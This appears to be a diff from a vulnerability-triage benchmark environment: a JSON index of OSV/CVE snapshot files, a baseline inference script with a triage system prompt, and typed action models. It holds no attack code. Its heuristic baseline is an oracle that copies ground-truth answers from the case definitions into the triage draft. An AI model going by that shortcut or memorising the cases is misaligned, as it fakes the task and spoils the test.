+      "osv_id": "PYSEC-2020-9",
+      "file": "data/snapshots/PYSEC-2020-9.json",
+      "cve_id": "CVE-2020-1737",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-1",
+      "file": "data/snapshots/PYSEC-2021-1.json",
+      "cve_id": "CVE-2021-20228",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-105",
+      "file": "data/snapshots/PYSEC-2021-105.json",
+      "cve_id": "CVE-2020-10729",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-106",
+      "file": "data/snapshots/PYSEC-2021-106.json",
+      "cve_id": "CVE-2021-20178",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-107",
+      "file": "data/snapshots/PYSEC-2021-107.json",
+      "cve_id": "CVE-2021-3447",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-122",
+      "file": "data/snapshots/PYSEC-2021-122.json",
+      "cve_id": "CVE-2021-35936",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2021-124",
+      "file": "data/snapshots/PYSEC-2021-124.json",
+      "cve_id": "CVE-2021-20191",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-125",
+      "file": "data/snapshots/PYSEC-2021-125.json",
+      "cve_id": null,
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-126",
+      "file": "data/snapshots/PYSEC-2021-126.json",
+      "cve_id": "CVE-2021-3533",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-2",
+      "file": "data/snapshots/PYSEC-2021-2.json",
+      "cve_id": "CVE-2021-26559",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2021-3",
+      "file": "data/snapshots/PYSEC-2021-3.json",
+      "cve_id": "CVE-2021-26697",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2021-326",
+      "file": "data/snapshots/PYSEC-2021-326.json",
+      "cve_id": "CVE-2021-38540",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2021-335",
+      "file": "data/snapshots/PYSEC-2021-335.json",
+      "cve_id": "CVE-2021-32807",
+      "package": "accesscontrol"
+    },
+    {
+      "osv_id": "PYSEC-2021-358",
+      "file": "data/snapshots/PYSEC-2021-358.json",
+      "cve_id": "CVE-2021-3583",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2021-370",
+      "file": "data/snapshots/PYSEC-2021-370.json",
+      "cve_id": "CVE-2021-32807",
+      "package": "accesscontrol"
+    },
+    {
+      "osv_id": "PYSEC-2021-4",
+      "file": "data/snapshots/PYSEC-2021-4.json",
+      "cve_id": "CVE-2021-28359",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2021-76",
+      "file": "data/snapshots/PYSEC-2021-76.json",
+      "cve_id": "CVE-2021-21330",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2021-839",
+      "file": "data/snapshots/PYSEC-2021-839.json",
+      "cve_id": "CVE-2021-43775",
+      "package": "aim"
+    },
+    {
+      "osv_id": "PYSEC-2021-840",
+      "file": "data/snapshots/PYSEC-2021-840.json",
+      "cve_id": "CVE-2021-3840",
+      "package": "antilles-tools"
+    },
+    {
+      "osv_id": "PYSEC-2021-876",
+      "file": "data/snapshots/PYSEC-2021-876.json",
+      "cve_id": "CVE-2020-13922",
+      "package": "apache-dolphinscheduler"
+    },
+    {
+      "osv_id": "PYSEC-2022-11",
+      "file": "data/snapshots/PYSEC-2022-11.json",
+      "cve_id": "CVE-2021-45230",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-164",
+      "file": "data/snapshots/PYSEC-2022-164.json",
+      "cve_id": "CVE-2021-3620",
+      "package": "ansible"
+    },
+    {
+      "osv_id": "PYSEC-2022-176",
+      "file": "data/snapshots/PYSEC-2022-176.json",
+      "cve_id": "CVE-2022-25598",
+      "package": "apache-dolphinscheduler"
+    },
+    {
+      "osv_id": "PYSEC-2022-182",
+      "file": "data/snapshots/PYSEC-2022-182.json",
+      "cve_id": "CVE-2018-25033",
+      "package": "admesh"
+    },
+    {
+      "osv_id": "PYSEC-2022-253",
+      "file": "data/snapshots/PYSEC-2022-253.json",
+      "cve_id": "CVE-2021-4041",
+      "package": "ansible-runner"
+    },
+    {
+      "osv_id": "PYSEC-2022-261",
+      "file": "data/snapshots/PYSEC-2022-261.json",
+      "cve_id": "CVE-2022-38170",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-263",
+      "file": "data/snapshots/PYSEC-2022-263.json",
+      "cve_id": "CVE-2022-38054",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-279",
+      "file": "data/snapshots/PYSEC-2022-279.json",
+      "cve_id": "CVE-2022-40604",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-280",
+      "file": "data/snapshots/PYSEC-2022-280.json",
+      "cve_id": "CVE-2022-40754",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-29",
+      "file": "data/snapshots/PYSEC-2022-29.json",
+      "cve_id": "CVE-2021-45229",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-30",
+      "file": "data/snapshots/PYSEC-2022-30.json",
+      "cve_id": "CVE-2022-24288",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-42970",
+      "file": "data/snapshots/PYSEC-2022-42970.json",
+      "cve_id": "CVE-2022-43982",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-42971",
+      "file": "data/snapshots/PYSEC-2022-42971.json",
+      "cve_id": "CVE-2022-43985",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-42972",
+      "file": "data/snapshots/PYSEC-2022-42972.json",
+      "cve_id": "CVE-2022-43766",
+      "package": "apache-iotdb"
+    },
+    {
+      "osv_id": "PYSEC-2022-42981",
+      "file": "data/snapshots/PYSEC-2022-42981.json",
+      "cve_id": "CVE-2022-27949",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-42982",
+      "file": "data/snapshots/PYSEC-2022-42982.json",
+      "cve_id": "CVE-2022-40127",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-42983",
+      "file": "data/snapshots/PYSEC-2022-42983.json",
+      "cve_id": "CVE-2022-41672",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-42984",
+      "file": "data/snapshots/PYSEC-2022-42984.json",
+      "cve_id": "CVE-2022-45402",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2022-43059",
+      "file": "data/snapshots/PYSEC-2022-43059.json",
+      "cve_id": null,
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2022-43060",
+      "file": "data/snapshots/PYSEC-2022-43060.json",
+      "cve_id": "CVE-2022-32531",
+      "package": "apache-bookkeeper-client"
+    },
+    {
+      "osv_id": "PYSEC-2022-43066",
+      "file": "data/snapshots/PYSEC-2022-43066.json",
+      "cve_id": null,
+      "package": "aamiles"
+    },
+    {
+      "osv_id": "PYSEC-2022-43067",
+      "file": "data/snapshots/PYSEC-2022-43067.json",
+      "cve_id": "CVE-2021-3701",
+      "package": "ansible-runner"
+    },
+    {
+      "osv_id": "PYSEC-2022-43068",
+      "file": "data/snapshots/PYSEC-2022-43068.json",
+      "cve_id": "CVE-2021-3702",
+      "package": "ansible-runner"
+    },
+    {
+      "osv_id": "PYSEC-2022-43069",
+      "file": "data/snapshots/PYSEC-2022-43069.json",
+      "cve_id": "CVE-2022-38369",
+      "package": "apache-iotdb"
+    },
+    {
+      "osv_id": "PYSEC-2022-43070",
+      "file": "data/snapshots/PYSEC-2022-43070.json",
+      "cve_id": null,
+      "package": "apache-iotdb"
+    },
+    {
+      "osv_id": "PYSEC-2023-1",
+      "file": "data/snapshots/PYSEC-2023-1.json",
+      "cve_id": null,
+      "package": "adyen"
+    },
+    {
+      "osv_id": "PYSEC-2023-103",
+      "file": "data/snapshots/PYSEC-2023-103.json",
+      "cve_id": "CVE-2022-46651",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-104",
+      "file": "data/snapshots/PYSEC-2023-104.json",
+      "cve_id": "CVE-2023-22887",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-105",
+      "file": "data/snapshots/PYSEC-2023-105.json",
+      "cve_id": "CVE-2023-22888",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-106",
+      "file": "data/snapshots/PYSEC-2023-106.json",
+      "cve_id": "CVE-2023-36543",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-119",
+      "file": "data/snapshots/PYSEC-2023-119.json",
+      "cve_id": "CVE-2023-35908",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-120",
+      "file": "data/snapshots/PYSEC-2023-120.json",
+      "cve_id": "CVE-2023-37276",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2023-134",
+      "file": "data/snapshots/PYSEC-2023-134.json",
+      "cve_id": "CVE-2023-39508",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-136",
+      "file": "data/snapshots/PYSEC-2023-136.json",
+      "cve_id": "CVE-2023-39553",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-152",
+      "file": "data/snapshots/PYSEC-2023-152.json",
+      "cve_id": "CVE-2023-37379",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-156",
+      "file": "data/snapshots/PYSEC-2023-156.json",
+      "cve_id": "CVE-2023-40195",
+      "package": "apache-airflow-providers-apache-spark"
+    },
+    {
+      "osv_id": "PYSEC-2023-158",
+      "file": "data/snapshots/PYSEC-2023-158.json",
+      "cve_id": "CVE-2023-40273",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-170",
+      "file": "data/snapshots/PYSEC-2023-170.json",
+      "cve_id": "CVE-2023-40611",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-171",
+      "file": "data/snapshots/PYSEC-2023-171.json",
+      "cve_id": "CVE-2023-40712",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-197",
+      "file": "data/snapshots/PYSEC-2023-197.json",
+      "cve_id": "CVE-2023-42663",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-2",
+      "file": "data/snapshots/PYSEC-2023-2.json",
+      "cve_id": "CVE-2023-25695",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-202",
+      "file": "data/snapshots/PYSEC-2023-202.json",
+      "cve_id": "CVE-2023-42780",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-203",
+      "file": "data/snapshots/PYSEC-2023-203.json",
+      "cve_id": "CVE-2023-42792",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-204",
+      "file": "data/snapshots/PYSEC-2023-204.json",
+      "cve_id": "CVE-2023-45348",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-218",
+      "file": "data/snapshots/PYSEC-2023-218.json",
+      "cve_id": "CVE-2023-46288",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-231",
+      "file": "data/snapshots/PYSEC-2023-231.json",
+      "cve_id": "CVE-2023-42781",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-232",
+      "file": "data/snapshots/PYSEC-2023-232.json",
+      "cve_id": "CVE-2023-47037",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-246",
+      "file": "data/snapshots/PYSEC-2023-246.json",
+      "cve_id": "CVE-2023-47627",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2023-247",
+      "file": "data/snapshots/PYSEC-2023-247.json",
+      "cve_id": "CVE-2023-47641",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2023-250",
+      "file": "data/snapshots/PYSEC-2023-250.json",
+      "cve_id": "CVE-2023-49081",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2023-251",
+      "file": "data/snapshots/PYSEC-2023-251.json",
+      "cve_id": "CVE-2023-49082",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2023-263",
+      "file": "data/snapshots/PYSEC-2023-263.json",
+      "cve_id": null,
+      "package": "admesh"
+    },
+    {
+      "osv_id": "PYSEC-2023-264",
+      "file": "data/snapshots/PYSEC-2023-264.json",
+      "cve_id": "CVE-2023-47265",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-265",
+      "file": "data/snapshots/PYSEC-2023-265.json",
+      "cve_id": "CVE-2023-48291",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-266",
+      "file": "data/snapshots/PYSEC-2023-266.json",
+      "cve_id": "CVE-2023-49920",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-267",
+      "file": "data/snapshots/PYSEC-2023-267.json",
+      "cve_id": "CVE-2023-50783",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-268",
+      "file": "data/snapshots/PYSEC-2023-268.json",
+      "cve_id": "CVE-2023-48796",
+      "package": "apache-dolphinscheduler"
+    },
+    {
+      "osv_id": "PYSEC-2023-3",
+      "file": "data/snapshots/PYSEC-2023-3.json",
+      "cve_id": "CVE-2023-28707",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-4",
+      "file": "data/snapshots/PYSEC-2023-4.json",
+      "cve_id": "CVE-2022-45875",
+      "package": "apache-dolphinscheduler"
+    },
+    {
+      "osv_id": "PYSEC-2023-5",
+      "file": "data/snapshots/PYSEC-2023-5.json",
+      "cve_id": "CVE-2023-24829",
+      "package": "apache-iotdb"
+    },
+    {
+      "osv_id": "PYSEC-2023-59",
+      "file": "data/snapshots/PYSEC-2023-59.json",
+      "cve_id": "CVE-2023-25754",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-6",
+      "file": "data/snapshots/PYSEC-2023-6.json",
+      "cve_id": "CVE-2023-24830",
+      "package": "apache-iotdb"
+    },
+    {
+      "osv_id": "PYSEC-2023-60",
+      "file": "data/snapshots/PYSEC-2023-60.json",
+      "cve_id": "CVE-2023-29247",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2023-7",
+      "file": "data/snapshots/PYSEC-2023-7.json",
+      "cve_id": "CVE-2023-24831",
+      "package": "apache-iotdb"
+    },
+    {
+      "osv_id": "PYSEC-2023-8",
+      "file": "data/snapshots/PYSEC-2023-8.json",
+      "cve_id": "CVE-2023-30771",
+      "package": "apache-iotdb"
+    },
+    {
+      "osv_id": "PYSEC-2023-89",
+      "file": "data/snapshots/PYSEC-2023-89.json",
+      "cve_id": "CVE-2023-35005",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-13",
+      "file": "data/snapshots/PYSEC-2024-13.json",
+      "cve_id": "CVE-2023-50943",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-14",
+      "file": "data/snapshots/PYSEC-2024-14.json",
+      "cve_id": "CVE-2023-50944",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-152",
+      "file": "data/snapshots/PYSEC-2024-152.json",
+      "cve_id": null,
+      "package": "aiocpa"
+    },
+    {
+      "osv_id": "PYSEC-2024-181",
+      "file": "data/snapshots/PYSEC-2024-181.json",
+      "cve_id": "CVE-2024-41937",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-182",
+      "file": "data/snapshots/PYSEC-2024-182.json",
+      "cve_id": "CVE-2024-45784",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-189",
+      "file": "data/snapshots/PYSEC-2024-189.json",
+      "cve_id": "CVE-2024-39863",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-190",
+      "file": "data/snapshots/PYSEC-2024-190.json",
+      "cve_id": "CVE-2024-39877",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-195",
+      "file": "data/snapshots/PYSEC-2024-195.json",
+      "cve_id": "CVE-2024-25142",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-212",
+      "file": "data/snapshots/PYSEC-2024-212.json",
+      "cve_id": "CVE-2024-45034",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-221",
+      "file": "data/snapshots/PYSEC-2024-221.json",
+      "cve_id": "CVE-2024-27305",
+      "package": "aiosmtpd"
+    },
+    {
+      "osv_id": "PYSEC-2024-24",
+      "file": "data/snapshots/PYSEC-2024-24.json",
+      "cve_id": "CVE-2024-23334",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2024-245",
+      "file": "data/snapshots/PYSEC-2024-245.json",
+      "cve_id": "CVE-2024-27906",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-26",
+      "file": "data/snapshots/PYSEC-2024-26.json",
+      "cve_id": "CVE-2024-23829",
+      "package": "aiohttp"
+    },
+    {
+      "osv_id": "PYSEC-2024-36",
+      "file": "data/snapshots/PYSEC-2024-36.json",
+      "cve_id": "CVE-2024-0690",
+      "package": "ansible-core"
+    },
+    {
+      "osv_id": "PYSEC-2024-42",
+      "file": "data/snapshots/PYSEC-2024-42.json",
+      "cve_id": "CVE-2024-26280",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2024-46",
+      "file": "data/snapshots/PYSEC-2024-46.json",
+      "cve_id": "CVE-2024-28746",
+      "package": "apache-airflow"
+    },
+    {
+      "osv_id": "PYSEC-2025-51",
+      "file": "data/snapshots/PYSEC-2025-51.json",
+      "cve_id": "CVE-2025-50213",
+      "package": "apache-airflow-providers-snowflake"
+    }
+  ]
+}

inference.py ADDED Viewed

	@@ -0,0 +1,313 @@

+"""Baseline inference script for the vulnerability triage environment."""
+from __future__ import annotations
+import argparse
+import json
+import os
+from typing import Dict, List, Optional
+from openai import OpenAI
+from openenv.core import GenericEnvClient
+API_BASE_URL = os.getenv("API_BASE_URL", "https://api.openai.com/v1")
+MODEL_NAME = os.getenv("MODEL_NAME", "gpt-4o-mini")
+HF_TOKEN = os.getenv("HF_TOKEN")
+from models import VulnTriageAction
+from server.cases import TASK_ORDER, get_case_definition
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+SYSTEM_PROMPT = """You are triaging open-source vulnerability reports.
+Return ONLY a single JSON object — no prose, no markdown — with exactly these keys:
+  action_type  : string  (required) — one of the action types listed in available_actions
+  evidence_id  : string  (optional) — only used with inspect_evidence
+  value        : string  (optional) — a PLAIN STRING, never an object or array
+  rationale    : string  (required) — one short sentence
+Valid action_type values and their expected value strings:
+  read_report                     — no value needed
+  inspect_evidence                — set evidence_id to one id from available_evidence
+  search_nvd_database             — value: CVE ID (e.g. CVE-2023-1234) found in report aliases
+  fetch_commit_diff               — value: commit hash or hash fragment found in references
+  message_maintainer              — value: a question for the maintainer (e.g. "Is there a patch?")
+  set_validity                    — value: "valid" | "invalid" | "needs_more_info"
+  set_affected_package            — value: package name string, e.g. "guarddog"
+  set_affected_versions           — value: semver range string, e.g. "<0.1.5"
+  set_severity                    — value: "low" | "medium" | "high" | "critical"
+  set_exploitability              — value: "low" | "medium" | "high"
+  set_next_action                 — value: "patch" | "publish_advisory" | "close" | "escalate" | "request_info"
+  set_missing_information         — value: one missing info item as a plain string
+  submit_triage                   — no value needed
+Strategy: read_report first, then use tools (search_nvd, fetch_commit, message_maintainer) to unlock hidden evidence, then fill all draft fields, then submit.
+Note: You CANNOT inspect "nvd_assessment", "github_commit_diff", or "vendor_status" directly. You must use the tools above to reveal them.
+"""
+def get_openai_client() -> OpenAI:
+    api_key = HF_TOKEN or os.getenv("OPENAI_API_KEY")
+    if not api_key:
+        raise RuntimeError("Set HF_TOKEN before running the OpenAI baseline.")
+    kwargs = {"api_key": api_key}
+    if API_BASE_URL:
+        kwargs["base_url"] = API_BASE_URL
+    return OpenAI(**kwargs)
+def parse_json_response(text: str) -> Dict[str, str]:
+    """Extract the first valid JSON object from a model response.
+    Handles:
+    - Markdown fences (```json ... ```)
+    - Think-blocks from reasoning models (<think>...</think>)
+    - Surrounding prose before/after the JSON object
+    """
+    import re as _re
+    text = text.strip()
+    # Strip reasoning/think blocks produced by models like Qwen3 or DeepSeek
+    text = _re.sub(r"<think>.*?</think>", "", text, flags=_re.DOTALL | _re.IGNORECASE).strip()
+    # Strip markdown fences
+    if "```" in text:
+        lines = [ln for ln in text.splitlines() if not ln.strip().startswith("```")]
+        text = "\n".join(lines).strip()
+    # Find the first complete JSON object by bracket matching
+    start = text.find("{")
+    if start == -1:
+        raise ValueError(f"No JSON object found in model response: {text[:200]!r}")
+    depth = 0
+    in_string = False
+    escape = False
+    for i, ch in enumerate(text[start:], start):
+        if escape:
+            escape = False
+            continue
+        if ch == "\\" and in_string:
+            escape = True
+            continue
+        if ch == '"' and not escape:
+            in_string = not in_string
+        if in_string:
+            continue
+        if ch == "{":
+            depth += 1
+        elif ch == "}":
+            depth -= 1
+            if depth == 0:
+                return json.loads(text[start : i + 1])
+    raise ValueError(f"Incomplete JSON object in model response: {text[:200]!r}")
+def heuristic_policy(observation: Dict) -> Dict[str, str]:
+    if "read_report" not in observation["action_history"]:
+        return {"action_type": "read_report", "rationale": "Start by reading the report"}
+    truth = get_case_definition(observation["task_id"]).truth
+    supporting_evidence_ids = set(truth.supporting_evidence_ids)
+    visible_ids = {item["evidence_id"] for item in observation["visible_evidence"]}
+    remaining_supporting = [
+        evidence_id
+        for evidence_id in observation["available_evidence"]
+        if evidence_id in supporting_evidence_ids and evidence_id not in visible_ids
+    ]
+    if remaining_supporting:
+        eval_id = remaining_supporting[0]
+        # Interactive Tools Support:
+        if eval_id == "nvd_assessment":
+            # The oracle magically knows the OSV ID to query (alias)
+            from server.cases import SEEDS
+            seed = SEEDS[observation["task_id"]]
+            return {"action_type": "search_nvd_database", "value": seed.osv_id, "rationale": "Fetch NVD dynamically"}
+        elif eval_id == "github_commit_diff":
+            # Match any random commit substring
+            return {"action_type": "fetch_commit_diff", "value": "Commit", "rationale": "Fetch Diff dynamically"}
+        elif eval_id == "vendor_status":
+            return {"action_type": "message_maintainer", "value": "Is there an ETA for a patch?", "rationale": "Chat with maintainer"}
+        return {
+            "action_type": "inspect_evidence",
+            "evidence_id": eval_id,
+            "rationale": "Reveal the next supporting evidence item",
+        }
+    draft = observation["draft"]
+    score = observation["score_breakdown"]
+    by_truth = [
+        ("set_validity", truth.validity),
+        ("set_affected_package", truth.affected_package),
+        ("set_affected_versions", truth.affected_versions),
+        ("set_severity", truth.severity),
+        ("set_exploitability", truth.exploitability),
+        ("set_next_action", truth.next_action),
+    ]
+    for action_type, value in by_truth:
+        if draft[action_type.replace("set_", "")] != value:
+            return {"action_type": action_type, "value": value, "rationale": "Update the draft"}
+    # Submit any required missing-information items not yet recorded in the draft
+    existing_mi = {v.strip().lower() for v in draft.get("missing_information", [])}
+    for mi_item in truth.missing_information:
+        if mi_item.strip().lower() not in existing_mi:
+            return {
+                "action_type": "set_missing_information",
+                "value": mi_item,
+                "rationale": "Record known missing information",
+            }
+    return {"action_type": "submit_triage", "rationale": f"Current total score is {score['total']}"}
+def llm_policy(client: OpenAI, model_name: str, observation: Dict) -> Dict[str, str]:
+    response = client.chat.completions.create(
+        model=model_name,
+        temperature=0,
+        messages=[
+            {"role": "system", "content": SYSTEM_PROMPT},
+            {
+                "role": "user",
+                "content": json.dumps(observation, indent=2, sort_keys=True),
+            },
+        ],
+    )
+    text = response.choices[0].message.content
+    return parse_json_response(text)
+_VALID_ACTION_KEYS = {"action_type", "evidence_id", "value", "rationale"}
+def sanitize_action_payload(payload: Dict) -> Dict:
+    """Keep only valid VulnTriageAction keys and coerce bad value types."""
+    clean = {k: v for k, v in payload.items() if k in _VALID_ACTION_KEYS}
+    if isinstance(clean.get("value"), (dict, list)):
+        clean["value"] = json.dumps(clean["value"])
+    return clean
+def run_local_episode(task_id: str, policy: str, model_name: str) -> Dict[str, float]:
+    print(f"START")
+    print(f"Task: {task_id}")
+    env = VulnTriageEnvironment()
+    observation = env.reset(task_id=task_id).model_dump()
+    client = get_openai_client() if policy == "openai" else None
+    last_action_str: str = ""
+    repeat_count: int = 0
+    step_num: int = 1
+    while not observation["done"]:
+        print(f"STEP")
+        action_payload = (
+            llm_policy(client, model_name, observation) if client else heuristic_policy(observation)
+        )
+        # Strip unknown keys then coerce bad value types
+        try:
+            clean = sanitize_action_payload(action_payload)
+            action = VulnTriageAction.model_validate(clean)
+        except Exception as exc:
+            print(f"  [warn] invalid action payload ({exc}), falling back to read_report")
+            action = VulnTriageAction(action_type="read_report", rationale="fallback: parse error")
+        # Break infinite loops where model repeats the same action
+        action_str = action.model_dump_json()
+        if action_str == last_action_str:
+            repeat_count += 1
+            if repeat_count >= 3:
+                print(f"  [warn] model repeated same action 3x — forcing submit_triage")
+                action = VulnTriageAction(action_type="submit_triage", rationale="loop guard")
+        else:
+            repeat_count = 0
+        last_action_str = action_str
+        print(f"Action: {action.action_type}")
+        observation = env.step(action).model_dump()
+        step_num += 1
+    print(f"END")
+    return {
+        "task_id": task_id,
+        "final_score": float(observation["final_score"] or 0.0),
+        "validity": observation["score_breakdown"]["validity"],
+        "package_versions": round(
+            (
+                observation["score_breakdown"]["affected_package"]
+                + observation["score_breakdown"]["affected_versions"]
+            )
+            / 2,
+            4,
+        ),
+        "severity": observation["score_breakdown"]["severity"],
+        "exploitability": observation["score_breakdown"]["exploitability"],
+        "next_action": observation["score_breakdown"]["next_action"],
+    }
+def run_remote_episode(base_url: str, task_id: str, policy: str, model_name: str) -> Dict[str, float]:
+    print(f"START")
+    print(f"Task: {task_id}")
+    llm_client = get_openai_client() if policy == "openai" else None
+    env = GenericEnvClient(base_url=base_url).sync()
+    with env:
+        response = env.reset(task_id=task_id)
+        observation = response.observation
+        done = response.done
+        step_num: int = 1
+        while not done:
+            print(f"STEP")
+            action_payload = (
+                llm_policy(llm_client, model_name, observation)
+                if llm_client
+                else heuristic_policy(observation)
+            )
+            print(f"Action: {action_payload.get('action_type')}")
+            response = env.step(action_payload)
+            observation = response.observation
+            done = response.done
+            step_num += 1
+    print(f"END")
+    final_score = float(observation.get("final_score") or 0.0)
+    return {
+        "task_id": task_id,
+        "final_score": final_score,
+        "validity": observation["score_breakdown"]["validity"],
+        "package_versions": round(
+            (
+                observation["score_breakdown"]["affected_package"]
+                + observation["score_breakdown"]["affected_versions"]
+            )
+            / 2,
+            4,
+        ),
+        "severity": observation["score_breakdown"]["severity"],
+        "exploitability": observation["score_breakdown"]["exploitability"],
+        "next_action": observation["score_breakdown"]["next_action"],
+    }
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--policy", choices=["openai", "heuristic"], default="heuristic")
+    parser.add_argument("--model", default=MODEL_NAME)
+    parser.add_argument("--env-base-url", dest="base_url", default=os.getenv("ENV_BASE_URL"))
+    args = parser.parse_args()
+    results: List[Dict[str, float]] = []
+    for task_id in TASK_ORDER:
+        if args.base_url:
+            results.append(run_remote_episode(args.base_url, task_id, args.policy, args.model))
+        else:
+            results.append(run_local_episode(task_id, args.policy, args.model))
+    aggregate = round(sum(item["final_score"] for item in results) / len(results), 4)
+    print(json.dumps({"policy": args.policy, "model": args.model, "average_score": aggregate, "tasks": results}, indent=2))
+if __name__ == "__main__":
+    main()

models.py ADDED Viewed

	@@ -0,0 +1,144 @@

+"""Typed models for the vulnerability triage environment."""
+from __future__ import annotations
+from typing import Dict, List, Literal, Optional
+from openenv.core.env_server.types import Action, Observation, State
+from pydantic import BaseModel, Field
+ActionType = Literal[
+    "read_report",
+    "inspect_evidence",
+    "search_nvd_database",
+    "fetch_commit_diff",
+    "message_maintainer",
+    "set_validity",
+    "set_affected_package",
+    "set_affected_versions",
+    "set_severity",
+    "set_exploitability",
+    "set_next_action",
+    "set_missing_information",
+    "request_more_info",
+    "submit_triage",
+]
+ValidityLabel = Literal["unknown", "valid", "invalid", "needs_more_info"]
+SeverityLabel = Literal["unknown", "low", "medium", "high", "critical"]
+ExploitabilityLabel = Literal["unknown", "low", "medium", "high"]
+NextActionLabel = Literal[
+    "unknown",
+    "request_info",
+    "close",
+    "escalate",
+    "patch",
+    "publish_advisory",
+]
+class EvidenceItem(BaseModel):
+    """Evidence the agent can reveal during triage."""
+    evidence_id: str = Field(..., description="Unique identifier for this evidence item")
+    title: str = Field(..., description="Short evidence title")
+    summary: str = Field(..., description="Evidence content shown to the agent")
+    kind: str = Field(..., description="Evidence type such as advisory or patch note")
+class TriageDraft(BaseModel):
+    """Agent-managed triage state."""
+    validity: ValidityLabel = "unknown"
+    affected_package: str = ""
+    affected_versions: str = ""
+    severity: SeverityLabel = "unknown"
+    exploitability: ExploitabilityLabel = "unknown"
+    next_action: NextActionLabel = "unknown"
+    missing_information: List[str] = Field(default_factory=list)
+class VulnTriageAction(Action):
+    """Structured action space for vulnerability triage."""
+    action_type: ActionType = Field(..., description="Which environment action to execute")
+    evidence_id: Optional[str] = Field(
+        default=None,
+        description="Evidence identifier used by inspect_evidence",
+    )
+    value: Optional[str] = Field(
+        default=None,
